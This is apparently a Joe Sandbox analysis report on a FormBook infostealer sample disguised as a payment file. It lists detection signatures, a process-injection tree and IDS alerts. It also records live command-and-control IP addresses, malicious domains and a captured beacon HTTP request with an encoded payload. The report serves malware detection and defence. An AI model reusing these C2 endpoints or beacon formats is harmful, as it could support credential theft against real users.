Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OUTSTANDING BALANCE PAYMENT.exe

Overview

General Information

Sample name:OUTSTANDING BALANCE PAYMENT.exe
Analysis ID:1564391
MD5:981e91572b25bce71c737bae5d1a2363
SHA1:a6c95d1a650270d13e749a2a57c3e530cecc8945
SHA256:9a962fa4cb6a7d760e8d7fa56996169d0e66f2897a2b331edefb6766ad756bb4
Tags:exeuser-julianmckein
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • OUTSTANDING BALANCE PAYMENT.exe (PID: 5068 cmdline: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe" MD5: 981E91572B25BCE71C737BAE5D1A2363)
    • svchost.exe (PID: 5532 cmdline: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hvGvYDBEAaXP.exe (PID: 6000 cmdline: "C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 2464 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • hvGvYDBEAaXP.exe (PID: 2788 cmdline: "C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2255087515.0000000000A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2254901007.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3859242171.0000000000310000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3861800488.00000000053D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3859423484.0000000002740000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe" , CommandLine: "C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe, NewProcessName: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe, OriginalFileName: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 2464, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe" , ProcessId: 2788, ProcessName: hvGvYDBEAaXP.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine|base64offset|contains: 4!, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ParentImage: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe, ParentProcessId: 5068, ParentProcessName: OUTSTANDING BALANCE PAYMENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ProcessId: 5532, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine|base64offset|contains: 4!, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ParentImage: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe, ParentProcessId: 5068, ParentProcessName: OUTSTANDING BALANCE PAYMENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ProcessId: 5532, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:27:57.078520+010020507451Malware Command and Control Activity Detected192.168.2.549742161.97.168.24580TCP
                2024-11-28T09:28:22.509221+010020507451Malware Command and Control Activity Detected192.168.2.549802202.79.161.15180TCP
                2024-11-28T09:28:58.778775+010020507451Malware Command and Control Activity Detected192.168.2.549839149.88.81.19080TCP
                2024-11-28T09:29:14.565776+010020507451Malware Command and Control Activity Detected192.168.2.54991985.159.66.9380TCP
                2024-11-28T09:29:29.874737+010020507451Malware Command and Control Activity Detected192.168.2.549956185.27.134.14480TCP
                2024-11-28T09:29:44.853284+010020507451Malware Command and Control Activity Detected192.168.2.549990104.21.95.16080TCP
                2024-11-28T09:29:59.720886+010020507451Malware Command and Control Activity Detected192.168.2.550003104.21.57.24880TCP
                2024-11-28T09:30:14.923216+010020507451Malware Command and Control Activity Detected192.168.2.550007154.88.22.10180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:27:57.078520+010028554651A Network Trojan was detected192.168.2.549742161.97.168.24580TCP
                2024-11-28T09:28:22.509221+010028554651A Network Trojan was detected192.168.2.549802202.79.161.15180TCP
                2024-11-28T09:28:58.778775+010028554651A Network Trojan was detected192.168.2.549839149.88.81.19080TCP
                2024-11-28T09:29:14.565776+010028554651A Network Trojan was detected192.168.2.54991985.159.66.9380TCP
                2024-11-28T09:29:29.874737+010028554651A Network Trojan was detected192.168.2.549956185.27.134.14480TCP
                2024-11-28T09:29:44.853284+010028554651A Network Trojan was detected192.168.2.549990104.21.95.16080TCP
                2024-11-28T09:29:59.720886+010028554651A Network Trojan was detected192.168.2.550003104.21.57.24880TCP
                2024-11-28T09:30:14.923216+010028554651A Network Trojan was detected192.168.2.550007154.88.22.10180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:28:14.446845+010028554641A Network Trojan was detected192.168.2.549780202.79.161.15180TCP
                2024-11-28T09:28:17.071740+010028554641A Network Trojan was detected192.168.2.549786202.79.161.15180TCP
                2024-11-28T09:28:19.837437+010028554641A Network Trojan was detected192.168.2.549794202.79.161.15180TCP
                2024-11-28T09:28:30.368632+010028554641A Network Trojan was detected192.168.2.549819149.88.81.19080TCP
                2024-11-28T09:28:33.040990+010028554641A Network Trojan was detected192.168.2.549827149.88.81.19080TCP
                2024-11-28T09:28:35.701607+010028554641A Network Trojan was detected192.168.2.549833149.88.81.19080TCP
                2024-11-28T09:29:06.681116+010028554641A Network Trojan was detected192.168.2.54989885.159.66.9380TCP
                2024-11-28T09:29:09.337387+010028554641A Network Trojan was detected192.168.2.54990685.159.66.9380TCP
                2024-11-28T09:29:11.993694+010028554641A Network Trojan was detected192.168.2.54991185.159.66.9380TCP
                2024-11-28T09:29:21.578452+010028554641A Network Trojan was detected192.168.2.549935185.27.134.14480TCP
                2024-11-28T09:29:24.272227+010028554641A Network Trojan was detected192.168.2.549942185.27.134.14480TCP
                2024-11-28T09:29:27.126140+010028554641A Network Trojan was detected192.168.2.549948185.27.134.14480TCP
                2024-11-28T09:29:37.087617+010028554641A Network Trojan was detected192.168.2.549972104.21.95.16080TCP
                2024-11-28T09:29:39.515162+010028554641A Network Trojan was detected192.168.2.549979104.21.95.16080TCP
                2024-11-28T09:29:42.118334+010028554641A Network Trojan was detected192.168.2.549985104.21.95.16080TCP
                2024-11-28T09:29:51.800817+010028554641A Network Trojan was detected192.168.2.550000104.21.57.24880TCP
                2024-11-28T09:29:54.465595+010028554641A Network Trojan was detected192.168.2.550001104.21.57.24880TCP
                2024-11-28T09:29:57.025271+010028554641A Network Trojan was detected192.168.2.550002104.21.57.24880TCP
                2024-11-28T09:30:06.946714+010028554641A Network Trojan was detected192.168.2.550004154.88.22.10180TCP
                2024-11-28T09:30:09.618557+010028554641A Network Trojan was detected192.168.2.550005154.88.22.10180TCP
                2024-11-28T09:30:12.274786+010028554641A Network Trojan was detected192.168.2.550006154.88.22.10180TCP
                2024-11-28T09:30:22.056204+010028554641A Network Trojan was detected192.168.2.550008209.74.77.10780TCP
                2024-11-28T09:30:24.718729+010028554641A Network Trojan was detected192.168.2.550009209.74.77.10780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.amayavp.xyz/d9ku/?QjtpF=dVl4&lJoLl=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94ZsfikbXdLyEshcSDsVMvwPhhK/JQDE9yK/18FWBwj6urmQ==Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/?QjtpF=dVl4&lJoLl=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2Avira URL Cloud: Label: malware
                Source: OUTSTANDING BALANCE PAYMENT.exeReversingLabs: Detection: 28%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2255087515.0000000000A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2254901007.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859242171.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3861800488.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859423484.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3859475868.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2255503523.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3860205283.00000000046F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: OUTSTANDING BALANCE PAYMENT.exeJoe Sandbox ML: detected
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2223313164.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2223964897.0000000000848000.00000004.00000020.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000003.2203222395.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000002.3859724974.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2223313164.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2223964897.0000000000848000.00000004.00000020.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000003.2203222395.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000002.3859724974.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hvGvYDBEAaXP.exe, 00000004.00000002.3859503425.000000000074E000.00000002.00000001.01000000.00000005.sdmp, hvGvYDBEAaXP.exe, 00000006.00000000.2322373186.000000000074E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2024610977.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2023684776.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156736627.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2158622530.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.000000000309E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2257620178.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2255186520.000000000264D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2024610977.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2023684776.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2156736627.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2158622530.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.000000000309E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000005.00000003.2257620178.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2255186520.000000000264D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BA6CA9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00BA60DD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00BA63F9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BAEB60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BAF5FA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAF56F FindFirstFileW,FindClose,0_2_00BAF56F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1B2F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1C8A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BB1F94
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0032C640 FindFirstFileW,FindNextFileW,FindClose,5_2_0032C640
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then xor eax, eax5_2_00319E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then mov ebx, 00000004h5_2_02C304FE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49794 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49786 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49780 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49827 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49839 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49839 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49911 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49802 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49906 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49802 -> 202.79.161.151:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49833 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49819 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49942 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49948 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49919 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49919 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49990 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49898 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50003 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49956 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49956 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49742 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49742 -> 161.97.168.245:80
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: Joe Sandbox ViewIP Address: 185.27.134.144 185.27.134.144
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BB4EB5
                Source: global trafficHTTP traffic detected: GET /xxr1/?lJoLl=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM6p0xnMJwAYLU5sobd2jLDJzuKUg73Rt+wU2Ky2uHmf2o9wQ==&QjtpF=dVl4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
